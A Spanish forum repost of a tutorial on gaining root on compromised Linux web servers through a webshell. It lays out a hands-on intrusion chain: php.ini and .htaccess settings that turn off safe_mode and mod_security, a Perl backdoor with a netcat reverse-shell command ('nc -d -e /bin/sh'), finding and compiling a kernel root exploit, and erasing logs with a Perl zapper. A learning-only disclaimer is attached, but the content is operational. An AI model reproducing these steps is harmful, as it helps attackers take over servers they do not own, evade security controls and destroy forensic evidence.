este tal vez sea uno de los temas principales para la seguridad web y porque no..para los desfacers.
Les recuerdo que la informacion es para aprovecharla al maximo osea aprender , practicar , profundizar y generar nuevas cosas mas no para andar dañando paginas por internet...pero bueno cada uno con sus gustos.
Les recuerdo que lo encontre via argeniverso , me parese que es una gran comunidad.
--------------------------------------------------------------------------------------------------
Rooteando Servidores Linux
Buenas noches
Pprimera parte de lo que son dos tutoriales enfocados al rooteo de servidor Linux y Windows.
En la primera entrega se tratarán temas relacionados con el Rooteo de servidores Linux.
Antes de todo, este tuto no explica como alojar, montar, o subir una shell a una web, para eso están las FAQ de Vulnerabilidades y Exploits, cuando tengamos una shell montada hay muchos factores que nos impediran poder sacarle partido, ejemplo de estar con un usuario sin ningun tipo de privilegio, por lo menos debemos tener de Lectura, Escritura, y Ejecucion para poder conseguir rootear adecuadamente.
1 - ¿Que es el Rooteo?
2 - ¿Que son las WebShells?
3 - Permisos.
4 - Directiva PHP: safe_mode y forma de aludirla.
5 - Consiguiendo una Shell Inversa.
6 - Kernel Attack.
7 - Borrando logs: zapper en perl.
1 - ¿Que es el Rooteo?Bien, el Rooteo proviene de la palabra Root, que en ámbitos Linux o Unix se refiere a un Super Usuario el cual posee y ejerce todos los poderes sobre un sistema, tiene permisos de lectura, escritura, ejecución... bajo cualquier circunstancia, de lo que se deduce:
Rooteo =
Administrar un sistema con todo privilegio.
El rooteo se realiza mediante el uso de una WebShell (explicado lo que es más abajo), ya haya sido alojada mediante SQLi, RFI, LFI, Xss, hasta un Ataque Flash
2 - ¿Que es una WebShell?Como su nombre nos indica, Web (de página web) y Shell (línea de comando), es una línea de comando alojada sobre una web que permite ejecutar código (comandos de toda la vida,
rm,
ls,
ping, etc [en linux]) sobre el servidor en el que está alojada.
Están programadas en PHP, gracias a esa funcion de PHP permiten ejecutar código sobre el servidor.
Existen muchas y muy conocidas, C99, R57, Locus, Ajax, N3tSh3ll, en fin, una infinidad, a la hora de trabajar con ellas son muy intuitivas, es como manejarse en un WebFtp pero con más "pecaminosas funciones" :fuma:
3 - PermisosCuando estamos en una WebShell, a la derecha de cada archivo vemos unas letras de este tipo,
drwx-r-xr - Lectura
x - Ejecución
d - Directorio
w - Escritura
- - No hay permiso
4 - Directiva PHP: safe_mode y forma de aludirlaBien, este punto es muy importante cuando manejamos una WebShell, ya que es la directiva que nos va a dejar trabajar tranquilos, comprueba muchas cosas por razones de seguirdad, las cuales podeis saber que hacen
aquí... Esta funcion viene deshabilitada por defecto, pero si os encontrais con ella activada haced lo siguiente:
La forma de aludirlo es subir al mismo path donde se encuentra nuestra WebShell un archivo de configuracion de directivas php, de nombre php y extensión .ini, es decir
php.ini.
El código del .ini en cuestión es este:
register_globals = On
engine = On
safe_mode = Off
safe_mode_exec_dir = On
Safe_mode_include_dir = On
Bien, ya hemos mandado a paseo al safe_mode
Otra cosa, cuando esteis sobre un servidor que sea Apache (lo más normal es que si), tambien necesitareis aludir el mod_security que no se muy bien por qué todavía, cuando esta funcionando no me deja trabajar bien
En este caso, debemos buscar por todo el directorio de apache o de la web, un fichero que se llame
.htaccess.
.htaccess (Acceso de Hiper-Texto) es el nombre por defecto del archivo de configuración de directorios de Apache. Provee de la habilidad para personalizar la configuración de las directivas definidas en el archivo de configuración principal. Las directivas de configuración necesitan estar en el contexto de .htaccess y el usuario necesita los permisos apropiados.
FuenteBueno, en la WebShell haceis click, y dentro de el añadis (sin borrar nada) estas lineas de codigo (sin borrar nada XD):
SecFilterEngine OFF
SecFilterScanPort OFF
SecFilterCheckURLEncoding OFF
SecFilterCheckUnicodeEncoding OFF
5 - Consiguiendo una Shell InversaBueno, esto de conseguir la Shell es opcional, pero es más comodo manejar la shell remota desde la nuestra.
Para eso nos haremos mano de NetCat
Shell Inversa
Aquí es donde entran en juego los BackDoors normalmente codeados en Perl.
En este mismo foro hay uno del FoS Team,
BackDoor (Recomiendo leer bien el code s))
Bueno, su uso no es complicado, en el code como se puede ver tenemos dos
if, depende de cual se declare al usar el BackDoor ejecutará
/bin/sh (shell de linux) o
cmd (shell de Windows) hacia el NetCat que esté a la escucha.
¿Que lio, verdad?
No es para tanto, lo que hace ese BackDoor, es enviar una Shell ya bien sea de Linux o Windows hacia la Ip y Puerto que le hayamos especificado, hace lo mismo que si ejecutasemos
nc -d -e /bin/sh TuIp Puerto, pero la pega esque a veces NetCat no viene instalado en ese tipo de sistemas, pero si perl
¿Como usarlo?Pregunta de oro.
Es fácil, nosotros, al ser una shell inversa debemos abrir nuestra shell y colocar:
Eso en nuestra shell, la que tenemos en Inicio, Ejecutar en el caso de Windows, y Aplicaciones, Accesorios en caso de Linux.
Guay, nosotros ya estamos escuchando con NetCat conexiones entrantes, ahora con el code previamente proporcionado (el del BackDoor BackFos) abrimos un editor de texto cualquiera y lo llamamos como queramos .pl, por ejemplo backfos.pl, lo subimos con la WebShell al directorio
/tmp de Linux y lo ejecutamos como bien pone en el código.
Vuelvo a decir que recomiendo leer detenidamente el codigo del backdoor, por si acaso s)
Si todo sale bien deberiamos recibir la shell donde teniamos a NetCat escuchando.
Por ahora vamos bien, tenemos la Shell de un servidor Linux.
Peeeeeeeeeeeeeeeeeeero, no somos root, por lo cual estamos muy limitados, tenemos solo control parcial sobre el servidor.
Para remediar eso, debemos hacer lo que se denomina un
Kernel Attack.
Kernel Attack
¿Qué es el Kernel?Kernel es el Núcleo de un SO, es la parte más interna de un SO, la que permite hacer funcionar el HardWare, SoftWare, cargar Drivers, en Fin, lo fundamental para que una máquina funcione.
Una imagen vale más que mil palabras XD
Bueno, si sabemos que es el Kernel, sabremos que Kernel Attack es algo que ataca al Kernel para poder sacar beneficios.
Eso se realiza mediante
Root Exploits, son exploits locales, es decir, que se los cambios se realizan donde fue ejecutado, no remotamente, normalmente programados en C que aprovechan una grave vulnerabilidad del Kernel que use un Sistema Operativo para conseguir dejarnos acceso como root.
Existe un exploit para casi todos los Kernel de Linux.
Para saber que Kernel (no SO) corre un Sistema Operativo Linux, deberemos cojer la shell que hemos recibido cuando escuchabamos y ejecutar lo siguiente:
De lo que nos devolvería esto:
Linux hostname 2.6.24-19-server #1 SMP Sat Jul 12 00:40:01 UTC 2008 i686 GNU/Linux
Bien, examinemos lo que nos dijo:
Linux Hostname - Nombre del Servidor
2.6.24-19 - Versión de Kernel, eso es lo que nos Interesa.
Bien, ahora deberemos hacer mano de
Google, e introducir una búsqueda tal que así:
2.6.24 kernel root exploit.
Bueno, cuando tengamos el Exploit, abriremos un editor de texto, pegaremos el code del Root Exploit, y lo guardaremos como lo que sea .c, ejemplo, root.c.
Bien, ahora tenemos que buscar en la WebShell un directorio donde tengamos permisos de ejecucion de archivos.
Leyendo por Internet ví que en /tmp normalmente hay permisos de ejecucion, lectura, escritura y todo eso, así que debemos de introducir:
De forma que nos situemos en el directorio tmp de Linux.
Ahora agarramos la WebShell y en las opciones de abajo nos dirigimos a /tmp.
Aí dentro subimos nuestro root.c.
Volvemos a la otra shell y como ya estabamos situados en /tmp introducimos:
Ahora nos debe mostrar todo lo que hay en ese directorio, debemos buscar root.c y hacer lo siguiente:
Introducimos todo en este orden:
gcc root.c -o rootexploit
Compilamos el code.
De lo que nos debe devolver
uid=numeros(nombre), esa es la Id que teneis ahora, que no es root.
Damos permisos 777, lectura, escritura, ejecucion, etc, para que pueda realizar su cometido.
De lo que devolverá
mode of 'rootexploit' changed to 0777 (rwxrwxrwx).
Cuando haya terminado:
Si nos devuelve
uid=0(root)...
¡Hemos Rooteado el servidor!
¡Lo estamos administrando!
¡Podemos incluso apagarlo!
7 - Borrando logs: zapper en perl
Como ahora ya tenemos permisos de escritura, lectura, ejecucion (root), podemos borrar los logs que quedaron estén en el directorio en el que estén, mediante este Zapper en Perl,
Zapper.
Como ya sabemos,
perl zapper.pl.
Saludos argeniverso!
FUENTE:http://argeniverso.66ghz.com/index.php
saludos roboticos